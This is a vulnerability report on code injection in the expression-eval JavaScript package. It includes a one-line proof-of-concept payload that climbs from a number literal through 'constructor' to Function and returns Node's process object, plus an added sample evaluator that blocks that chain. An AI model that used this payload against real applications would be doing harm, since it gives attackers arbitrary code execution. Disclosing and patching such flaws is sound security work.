Code Injection in donmccurdy/expression-eval


Reported on

Mar 25th 2021

✍️ Description

Although we have declared in the README.MD that this package should not be used with user-provided inputs, after I examined some projects that use this package, I found that many developers still use it that way, which may lead to serious security problems. So I think we still need to do some basic things to prevent dangerous actions in the package itself.

🕵️‍♂️ Proof of Concept

// PoC.js
const {compile} = require("expression-eval");
var payload = "(1).constructor.constructor('', 'return process')()"
console.log(compile(payload)()); // will return process

💥 Impact

Attackers can use the input as a payload without any prerequisites, and can execute any code they want.
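The "basic thing" the description asks for is to stop an expression from walking from a literal up to `Function` through inherited properties. The following is an added example, not expression-eval's own code: a minimal evaluator over jsep-shaped AST nodes (the node shapes and the two hand-built trees are assumptions constructed here so it runs without the package) that denies `constructor`, `__proto__` and `prototype` and only exposes own properties, so the PoC chain is rejected while a plain context lookup such as `user.name` still works.

```javascript
// Added example, not expression-eval's own code: a minimal evaluator for a
// jsep-style AST that refuses the property chain the PoC walks. The ASTs are
// constructed by hand so the example runs without the package installed.

// Property names that let an expression climb out of the supplied context.
const FORBIDDEN_PROPS = new Set(['constructor', '__proto__', 'prototype']);

function safeProperty(obj, prop) {
  const name = String(prop);
  if (FORBIDDEN_PROPS.has(name)) throw new Error(`access to "${name}" is not allowed`);
  // Expose own properties only: the inherited Number -> Function chain is
  // exactly what the PoC uses to reach Function('return process').
  if (obj == null || !Object.prototype.hasOwnProperty.call(obj, name)) return undefined;
  return obj[name];
}

function evaluate(node, context) {
  switch (node.type) {
    case 'Literal': return node.value;
    case 'Identifier': return safeProperty(context, node.name);
    case 'MemberExpression': {
      const obj = evaluate(node.object, context);
      const prop = node.computed ? evaluate(node.property, context) : node.property.name;
      return safeProperty(obj, prop);
    }
    case 'CallExpression': {
      const fn = evaluate(node.callee, context);
      if (typeof fn !== 'function') throw new Error('callee is not a function');
      return fn(...node.arguments.map((arg) => evaluate(arg, context)));
    }
    default: throw new Error(`unsupported node type ${node.type}`);
  }
}

// Small builders for jsep-shaped nodes (constructed here, not jsep output).
const lit = (value) => ({ type: 'Literal', value });
const id = (name) => ({ type: 'Identifier', name });
const member = (object, name) => ({ type: 'MemberExpression', computed: false, object, property: id(name) });
const call = (callee, args) => ({ type: 'CallExpression', callee, arguments: args });

// The PoC: (1).constructor.constructor('', 'return process')()
const pocAst = call(call(member(member(lit(1), 'constructor'), 'constructor'), [lit(''), lit('return process')]), []);
// A benign expression against a caller-supplied context: user.name
const benignAst = member(id('user'), 'name');

function runPoc() {
  try { evaluate(pocAst, {}); return 'escaped'; } catch (err) { return err.message; }
}
function runBenign() { return evaluate(benignAst, { user: { name: 'alice' } }); }
```

With this guard the PoC fails at the first `.constructor` access instead of reaching `process`; a denylist alone is not enough in general, which is why the own-property check is there too.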
